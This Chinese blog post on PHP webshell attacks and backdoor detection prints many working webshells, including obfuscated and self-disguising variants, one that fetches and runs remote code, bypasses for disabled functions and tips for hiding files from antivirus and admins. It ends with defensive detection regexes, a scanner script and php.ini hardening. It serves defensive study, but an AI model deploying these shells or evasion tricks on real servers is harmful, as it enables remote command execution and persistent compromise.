PHP安全之webshell和后門檢測

基於PHP的應用面臨着各種各樣的攻擊：

XSS：對PHP的Web應用而言，跨站腳本是一個易受攻擊的點。攻擊者可以利用它盜取用戶信息。你可以配置Apache，或是寫更安全的PHP代碼（驗證所有用戶輸入）來防范XSS攻擊
SQL注入：這是PHP應用中，數據庫層的易受攻擊點。防范方式同上。常用的方法是，使用mysql_real_escape_string()對參數進行轉義，而后進行SQL查詢。
文件上傳：它可以讓訪問者在服務器上放置（即上傳）文件。這會造成例如，刪除服務器文件、數據庫，獲取用戶信息等一系列問題。你可以使用PHP來禁止文件上傳，或編寫更安全的代碼（如檢驗用戶輸入，只允許上傳png、gif這些圖片格式）
包含本地與遠程文件：攻擊者可以使遠程服務器打開文件，運行任何PHP代碼，然后上傳或刪除文件，安裝后門。可以通過取消遠程文件執行的設置來防范
eval/assert：這個函數可以使一段字符串如同PHP代碼一樣執行。它通常被攻擊者用於在服務器上隱藏代碼和工具。通過配置PHP，取消eval等函數調用來實現
Sea-surt Attack（Cross-site request forgery，CSRF。跨站請求偽造）：這種攻擊會使終端用戶在當前賬號下執行非指定行為。這會危害終端用戶的數據與操作安全。如果目標終端用戶的賬號用於管理員權限，整個Web應用都會收到威脅。

這里介紹上述加粗的幾種攻擊的方法

一、各種webshell

隨着業務量的增大，越來越多的黑客來攻擊掃描，網站安全性日益重要，一不留神就被黑客控制了服務器，最常見的方式就是通過POST請求來上傳木馬文件，從而達到可以執行任意命令，如果被控制就大事不妙了

所以還是要正視服務器的安全

最流行的一種后門叫做一句話木馬，其形式如下所示：

<?php
if(isset($_REQUEST['cmd'])){
    $cmd = ($_REQUEST["cmd"]);
    system($cmd);
    echo "</pre>$cmd<pre>";
    die;
}
?>

這種容易被安全軟件檢測出來。為了增強隱蔽性，出現了各種一句話木馬的變形，通過各種函數來偽裝，這里不得不吐槽PHP弱類型對於安全來說是致命的

a、使用str_replace函數

<?php $a =str_replace(x,"","axsxxsxexrxxt");$a($_POST["code"]); ?>

//說明：請求參數  ?code=fputs(fopen(base64_decode(J2MucGhwJw==),w),base64_decode("PD9waHAgQGV2YWwoJF9QT1NUW2FdKTs/Pg=="))
最終執行命令<?php assert（fputs(fopen('c.php',w),"<?php @eval($_POST[a]);?>")）?>

b、使用str_rot13函數

<?php ($code = $_POST['code']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($code)', 'add'); ?>
//說明：首先，將eval函數用str_rot13('riny')隱藏。然后，利用 e 修飾符，在preg_replace完成字符串替換后，使得引擎將結果字符串作為php代碼使用eval方式進行評估並將返回值作為最終參與替換的字符串。

c、使用include函數

<?php $filename=$_GET['code'];include ($filename); ?>

//由於include方法可以直接編譯任何格式的文件為php格式運行，因此可以上傳一個txt格式的php文件，將真正的后門寫在文本當中。

d、使用pack函數

<?php if(empty($_SESSION['api']))
    $_SESSION['api']=substr(file_get_contents(sprintf('%s?  %s',pack(“H*”,'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′),uniqid())),3649);
    @preg_replace(“~(.*)~ies”,gzuncompress($_SESSION['api']),null);
?>

e、使用session

<?php
session_start();
$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);
$_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');

f、隱藏在html頁面

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>
<?php
@preg_replace("/[pageerror]/e",$_POST['error'],"saft");
header('HTTP/1.1 404 Not Found');
?>

g、使用assert函數

<?php assert($_POST[sb]);?>

或者

<?php
$item['wind'] = 'assert';
$array[] = $item;
$array[0]['wind']($_POST['iixosmse']);

h、使用copy函數復制文件

<?php
$reg="c"."o"."p"."y";
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);

二、代碼混淆

<?php  
@$_++; // $_ = 1  
$__=("#"^"|"); // $__ = _  
$__.=("."^"~"); // _P  
$__.=("/"^"`"); // _PO  
$__.=("|"^"/"); // _POS  
$__.=("{"^"/"); // _POST  
${$__}[!$_](${$__}[$_]); // $_POST[0]($_POST[1]);  
?>

或者

<?php  
    $penh="sIGpvaW4oYXJyYgiXlfc2xpY2UoJGEsgiJGMoJGEpLTgiMpKSkpgiKTtlY2hvICc8LycgiuJgiGsugiJz4nO30=";  
    $kthe="JGEpPjgiMpeyRrPSgidwcyc7ZWNobyAnPCcgiugiJGsuJz4nOgi2V2YWwoYgimFzZTY0X2giRlY2gi9kgiZShwcmVn";  
    $ftdf = str_replace("w","","stwrw_wrwepwlwawcwe");  
    $wmmi="X3JlcgiGxhY2UgioYXgiJyYXkoJy9bXlx3PVgixzXS8nLCgicvXHMvJyksIGFycmF5KCcnLCcrgiJyk";  
    $zrmt="JGM9J2NvdWgi50JzskgiYT0gikX0NgiPT0tJRgiTtpZihyZXNldCgkYSk9PSgidvbycggiJgiiYgJGMo";  
    $smgv = $ftdf("f", "", "bfafsfef6f4_fdfefcodfe");  
    $jgfi = $ftdf("l","","lclrlelaltel_functlilon");  
    $rdwm = $jgfi('', $smgv($ftdf("gi", "", $zrmt.$kthe.$wmmi.$penh))); $rdwm();  
?>

可以使用weevely工具來生成，代碼偽裝避開各種主流的殺毒軟件

PHP后門生成工具weevely

weevely是一款針對PHP的webshell的自由軟件，可用於模擬一個類似於telnet的連接shell，weevely通常用於web程序的漏洞利用，隱藏后門或者使用類似telnet的方式來代替web 頁面式的管理，weevely生成的服務器端php代碼是經過了base64編碼的，所以可以騙過主流的殺毒軟件和IDS，上傳服務器端代碼后通常可以通過weevely直接運行。

weevely所生成的PHP后門所使用的方法是現在比較主流的base64加密結合字符串變形技術，后門中所使用的函數均是常用的字符串處理函數，被作為檢查規則的eval，system等函數都不會直接出現在代碼中，從而可以致使后門文件繞過后門查找工具的檢查。使用暗組的Web后門查殺工具進行掃描，結果顯示該文件無任何威脅。

更常用的混淆視聽的方法:（這種是服務器層面的混淆）

修改文件時間
改名融入上傳后所在文件夾，讓人無法直觀看出文件異常
文件大小的偽裝處理(至少看起大小像個正常腳本)
選好藏身路徑並盡量少的訪問
畸形目錄%20

三、如果繞過配置文件

一般的服務器管理員會把 system、exec等危險函數禁用的，那么如何繞過呢？

1、使用反射

相關內容可參考：http://cn2.php.net/manual/en/reflectionfunction.invokeargs.php。

<?php
$func = new ReflectionFunction("system");
echo $func->invokeArgs(array("$_GET[c]"));
?>

2、使用callback

php提供的另外一種可間接調用函數的方法是callback. 這里使用了ob_start.具體說明可參考：http://www.php.net/manual/en/function.ob-start.php

<?php
$cb= 'system';
ob_start($cb);
echo $_GET[c];
ob_end_flush();
?>

php中支持callback的函數還有很多，比如 array_map,array_filter, array_reduce,usort(),uksort(),array_walk() 等

四、安全人員應該怎么做

1、如何查找

直觀尋找方式也有很多

通過文件名/修改時間/大小，文件備份比對發現異常（SVN/Git對比，查看文件是否被修改）
通過WEBSHELL后門掃描腳本發現，如Scanbackdoor.php/Pecker/shelldetect.php/（zhujiweishi ）
通過access.log訪問日志分析

下面是360 zhujiweishi ，在linux服務器上非常簡單好用

通過常見的關鍵詞如（可以使用find 和 grep 等命令結合起來搜索代碼中是否包含以下文件）

系統命令執行: system, passthru, shell_exec, exec, popen, proc_open
代碼執行: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13
文件包含: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite

通過簡單的python腳本

#!/usr/bin/env python
# encoding: utf-8
 
import os,sys
import re
import hashlib
import time
 
rulelist = [
    '(\$_(GET|POST|REQUEST)\[.{0,15}\]\s{0,10}\(\s{0,10}\$_(GET|POST|REQUEST)\[.{0,15}\]\))',
    '((eval|assert)(\s|\n)*\((\s|\n)*\$_(POST|GET|REQUEST)\[.{0,15}\]\))',
    '(eval(\s|\n)*\(base64_decode(\s|\n)*\((.|\n){1,200})',
    '(function\_exists\s*\(\s*[\'|\"](popen|exec|proc\_open|passthru)+[\'|\"]\s*\))',
    '((exec|shell\_exec|passthru)+\s*\(\s*\$\_(\w+)\[(.*)\]\s*\))',
    '(\$(\w+)\s*\(\s.chr\(\d+\)\))',
    '(\$(\w+)\s*\$\{(.*)\})',
    '(\$(\w+)\s*\(\s*\$\_(GET|POST|REQUEST|COOKIE|SERVER)+\[(.*)\]\s*\))',
    '(\$\_(GET|POST|REQUEST|COOKIE|SERVER)+\[(.*)\]\(\s*\$(.*)\))',
    '(\$\_\=(.*)\$\_)',
    '(\$(.*)\s*\((.*)\/e(.*)\,\s*\$\_(.*)\,(.*)\))',
    '(new com\s*\(\s*[\'|\"]shell(.*)[\'|\"]\s*\))',
    '(echo\s*curl\_exec\s*\(\s*\$(\w+)\s*\))',
    '((fopen|fwrite|fputs|file\_put\_contents)+\s*\((.*)\$\_(GET|POST|REQUEST|COOKIE|SERVER)+\[(.*)\](.*)\))',
    '(\(\s*\$\_FILES\[(.*)\]\[(.*)\]\s*\,\s*\$\_(GET|POST|REQUEST|FILES)+\[(.*)\]\[(.*)\]\s*\))',
    '(\$\_(\w+)(.*)(eval|assert|include|require|include\_once|require\_once)+\s*\(\s*\$(\w+)\s*\))',
    '((include|require|include\_once|require\_once)+\s*\(\s*[\'|\"](\w+)\.(jpg|gif|ico|bmp|png|txt|zip|rar|htm|css|js)+[\'|\"]\s*\))',
    '(eval\s*\(\s*\(\s*\$\$(\w+))',
    '((eval|assert|include|require|include\_once|require\_once|array\_map|array\_walk)+\s*\(\s*\$\_(GET|POST|REQUEST|COOKIE|SERVER|SESSION)+\[(.*)\]\s*\))',
    '(preg\_replace\s*\((.*)\(base64\_decode\(\$)'
    ]
 
def scan(path):
    print('           可疑文件         ')
    print('*'*30)
    for root,dirs,files in os.walk(path):
        for filespath in files:
            if os.path.getsize(os.path.join(root,filespath))<1024000:
                file= open(os.path.join(root,filespath))
                filestr = file.read()
                file.close()
                for rule in rulelist:
                    result = re.compile(rule).findall(filestr)
                    if result:
                        print '文件:'+os.path.join(root,filespath )
                        print '惡意代碼:'+str(result[0][0:200])
                        print ('最后修改時間:'+time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(os.path.getmtime(os.path.join(root,filespath)))))
                        print '\n\n'
                        break
def md5sum(md5_file):
    m = hashlib.md5()
    fp = open(md5_file)
    m.update(fp.read())
    return m.hexdigest()
    fp.close()
 
if md5sum('/etc/issue') == '3e3c7c4194b12af573ab11c16990c477':
    if md5sum('/usr/sbin/sshd') == 'abf7a90c36705ef679298a44af80b10b':
        pass
    else:
        print('*'*40)
        print "\033[31m sshd被修改，疑似留有后門\033[m"
        print('*'*40)
        time.sleep(5)
if md5sum('/etc/issue') == '6c9222ee501323045d85545853ebea55':
    if md5sum('/usr/sbin/sshd') == '4bbf2b12d6b7f234fa01b23dc9822838':
        pass
    else:
        print('*'*40)
        print "\033[31m sshd被修改，疑似留有后門\033[m"
        print('*'*40)
        time.sleep(5)
if __name__=='__main__':
 
    if len(sys.argv)!=2:
        print '參數錯誤'
        print "\t按惡意代碼查找:"+sys.argv[0]+'目錄名'
    if os.path.lexists(sys.argv[1]) == False:
        print "目錄不存在"
        exit()
    print ('\n\n開始查找:'+sys.argv[1])
    if len(sys.argv) ==2:
        scan(sys.argv[1])
    else:
        exit()

2、如何防范

php.ini 設置

disable_functions =phpinfo,passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,proc_get_status,ini_alter,ini_alter,ini_restore,dl,pfsockopen,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server,get_current_user,leak,putenv,popen,opendir
設置“safe_mode”為“on”
禁止“open_basedir” 可以禁止指定目錄之外的文件操作
expose_php設為off 這樣php不會在http文件頭中泄露信息
設置“allow_url_fopen”為“off” 可禁止遠程文件功能
log_errors”設為“on” 錯誤日志開啟

php編碼方面

所有用戶提交的信息 post get 或是其他形式提交的數據都要單獨寫個過濾函數處理一遍，養成習慣(intval，strip_tags，mysql_real_escape_string)
經常檢查有沒有一句話木馬 eval($_POST[ 全站搜索php代碼有沒有這樣的源代碼
文件要命名規范至少讓自己可以一目了然，哪些php文件名字有問題
如用開源代碼，有補丁出來的話，盡快打上補丁
如果攻擊者拿到了服務器的最高權限，有可能通過修改服務器的配置文件php.ini來達到他們隱藏后門的目的，前幾年比較流行。原理如下：php.ini 里面的這兩個配置項：auto_prepend_file ，auto_append_file 可以讓php解析前，自己加點東西進去 Automatically add files before or after any PHP document,如果被配置了eval()函數的后門那就很陰險了，php文件代碼里面查不出，只會在php解析前包含eval()函數進來並且因為是全局的所以所有php頁面都是后門！所以要先確認auto_prepend_file ，auto_append_file沒被配置成其他東西，才進行第3點的源代碼檢查。

服務器配置

配置的時候盡量使用最小權限，不要寫入或者執行的目錄不能給相應的權限

nginx或者apache配置的時候，不能訪問的目錄一定要配置為deny

待續。。。

參考文章

https://github.com/chenpingzhao/php-webshells

http://blog.csdn.net/miltonzhong/article/details/9714367

http://blog.jobbole.com/53821/